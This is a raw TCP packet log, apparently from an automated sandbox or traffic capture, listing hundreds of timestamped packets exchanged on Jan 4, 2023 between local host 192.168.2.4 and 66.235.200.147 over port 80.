Jan 4, 2023 16:47:45.494544983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494549036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494595051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494601011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494616985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494622946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494641066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494661093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494724035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494744062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494771957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494791985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.494962931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.494983912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495016098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495035887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495126963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495162964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495174885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495218039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495352983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495373011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495404959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495421886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495564938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495584965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495614052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495632887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495668888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495687962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495717049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495744944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495754004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495789051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495799065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495826006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.495831966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.495865107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496062994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496088028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496107101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496112108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496131897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496144056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496150970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496187925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496364117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496416092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496433020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496453047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496473074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496479988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496499062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496500015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496525049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496526957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496547937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496553898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496573925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496577978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496594906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496604919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496615887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496629953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496629953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496638060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496659040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496669054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496678114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496697903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496702909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496717930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496737003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496737957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496761084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496761084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496782064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496790886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496813059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496840000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496867895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496886969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496906996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496911049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496936083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496942997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.496973038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.496980906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497000933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497020960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497040987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497050047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497061014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497077942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497081995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497102022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497122049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497138977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497139931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497152090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497162104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497178078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497183084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497199059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497205973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497226000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497227907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497246027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497256994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497267008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497281075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497292042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497309923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497315884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497334957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497344017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497354031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497379065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497412920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497426987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497447014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497466087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497473001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497484922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497495890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497517109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497539997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497551918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497589111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497597933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497625113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497628927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497646093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497665882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497668982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497699976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497704029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497724056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497731924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497742891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497751951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497772932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497802019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497827053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497845888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497864962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497872114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497894049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497900963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.497916937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497937918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.497986078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498022079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498034000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498042107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498061895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498066902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498081923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498085976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498109102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498126984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498178959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498198986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498218060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498225927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498248100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498255014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498269081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498275995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498298883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498312950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498317957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498349905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498357058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498387098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498392105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498408079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498426914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498459101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498492002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498492002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498513937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498538017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498549938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498568058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498594999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498626947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498646975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498666048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498683929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498702049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498714924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498739958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498755932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498771906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498804092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498804092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498833895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498851061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498861074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498881102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498886108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498914003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498919964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498939991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498945951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498966932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.498984098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.498989105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499003887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499028921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499028921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499053955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499070883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499072075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499108076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499113083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499156952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499167919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499191046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499214888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499228954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499233961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499248981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499269009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499280930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499310017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499316931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499349117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499362946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499406099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499449968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499470949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499490976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499492884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499511003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499516010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499541044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499547958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499567986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499587059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499627113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499641895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499651909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499680042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499690056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499706030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499744892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499766111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499779940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499810934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499820948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499841928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499866962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499905109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499912977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499933004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499952078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499955893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.499965906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.499979019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500020027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500065088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500086069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500117064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500123978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500144005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500157118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500186920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500195980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500231981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500247002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500255108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500281096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500317097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500338078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500423908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500444889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500464916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500484943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500595093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500614882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500633955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500653982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500673056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500691891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500713110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500731945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500755072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500755072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500755072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500755072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500755072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500756025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500756025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500756025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500797987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500797987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500797987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500798941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500798941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500801086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500798941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500840902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500860929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500894070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500897884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500936985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500968933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.500972986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.500991106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501009941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501020908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501029968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501044989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501065969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501071930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501091003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501091957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501118898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501148939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501168966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501173019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501188993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501200914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501223087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501241922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501255035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501275063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501303911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501311064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501332045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501362085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501365900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501430035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501437902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501458883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501485109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501501083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501574993 CET	80	49696	66.235.200.147	192.168.2.4
